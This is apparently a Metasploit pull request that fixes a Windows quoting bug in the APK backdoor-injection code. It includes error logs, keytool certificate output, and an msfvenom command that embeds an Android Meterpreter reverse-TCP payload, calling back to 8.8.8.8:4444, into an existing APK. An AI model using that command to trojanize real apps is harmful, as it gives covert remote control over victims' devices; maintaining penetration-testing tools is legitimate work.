### PR TITLE
Fix issue #8887, when injecting into an existing .apk file on windows

### DIFF
--- a/lib/msf/core/payload/apk.rb
+++ b/lib/msf/core/payload/apk.rb
@@ -125,7 +125,7 @@ class Msf::Payload::Apk
 
   def parse_orig_cert_data(orig_apkfile)
     orig_cert_data = Array[]
-    keytool_output = run_cmd("keytool -J-Duser.language=en -printcert -jarfile '#{orig_apkfile}'")
+    keytool_output = run_cmd(%Q{keytool -J-Duser.language=en -printcert -jarfile "#{orig_apkfile}"})
     owner_line = keytool_output.match(/^Owner:.+/)[0]
     orig_cert_dname = owner_line.gsub(/^.*:/, '').strip
     orig_cert_data.push("#{orig_cert_dname}")


### PR DESCRIPTION
Fix issue #8887, when injecting into an existing .apk file on windows

The bug code is 
```
#File lib/msf/core/payload/apk.rb line 128
keytool_output = run_cmd("keytool -J-Duser.language=en -printcert -jarfile '#{orig_apkfile}'")
```
Run 'msfvenom' like this:
```
./msfvenom -x test.apk -p android/meterpreter/reverse_tcp lhost=8.8.8.8 lport=4444 -o ../venom.apk
```

Error info:
```
> msfvenom.bat -x test.apk -p android/meterpreter/reverse_tcp lhost=8.8.8.8 lport=4444 -o venom.apk
Using APK template: test.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
Error: undefined method `[]' for nil:NilClass
```
Log
```
[08/10/2018 17:22:14] [e(0)] core: NoMethodError : undefined method `[]' for nil:NilClass
D:/metasploit/metasploit-framework/embedded/framework/lib/msf/core/payload/apk.rb:132:in `parse_orig_cert_data'
D:/metasploit/metasploit-framework/embedded/framework/lib/msf/core/payload/apk.rb:190:in `backdoor_apk'
D:/metasploit/metasploit-framework/embedded/framework/lib/msf/core/payload_generator.rb:337:in `generate_payload'
D:/metasploit/metasploit-framework/bin/../embedded/framework/msfvenom:349:in `<main>'
```

The keytool command line would be:
```
keytool -J-Duser.language=en -printcert -jarfile 'test.apk'
```

This command would failed on windows, but succeed on linux.
`Windows`:
```
D:\cmder
> keytool -J-Duser.language=en -printcert -jarfile 'test.apk'
keytool error: java.io.FileNotFoundException: 'test.apk' (The filename, directory name, or volume label syntax is incorrect)
```
`Linux`:
```
$ keytool -J-Duser.language=en -printcert -jarfile '/root/Desktop/msf_dev/test.apk'
Signer #1:

Signature:

Owner: CN=Alex Weblowsky, OU=Mobile Development, O=Tefincom, L=Panama, ST=Panama, C=PA
Issuer: CN=Alex Weblowsky, OU=Mobile Development, O=Tefincom, L=Panama, ST=Panama, C=PA
Serial number: 724d9712
Valid from: Fri Jan 22 02:19:25 EST 2016 until: Tue Jan 15 02:19:25 EST 2041
Certificate fingerprints:
	 MD5:  AE:8E:33:97:A9:18:0B:20:96:84:ED:E5:1D:74:F9:01
	 SHA1: FA:BA:42:56:1B:E5:20:57:F6:70:B4:41:2F:D5:13:EF:68:7C:A4:7A
	 SHA256: BC:64:AE:07:25:AF:65:6B:3B:10:B6:84:CD:1D:F4:C9:D6:B7:F8:1B:C5:DC:32:DF:3A:3B:2C:E9:4C:E6:14:66
	 Signature algorithm name: SHA256withRSA
	 Version: 3

Extensions: 

#1: ObjectId: 2.5.29.14 Criticality=false
SubjectKeyIdentifier [
KeyIdentifier [
0000: 3F 65 F2 6F 47 79 A5 3F   DB 78 D1 79 61 1E 1E B3  ?e.oGy.?.x.ya...
0010: 26 CD 3D 37                                        &.=7
]
]


^C#                         
```

The reason is single quota on windows, it should be double quota.
So I make this change to fix it.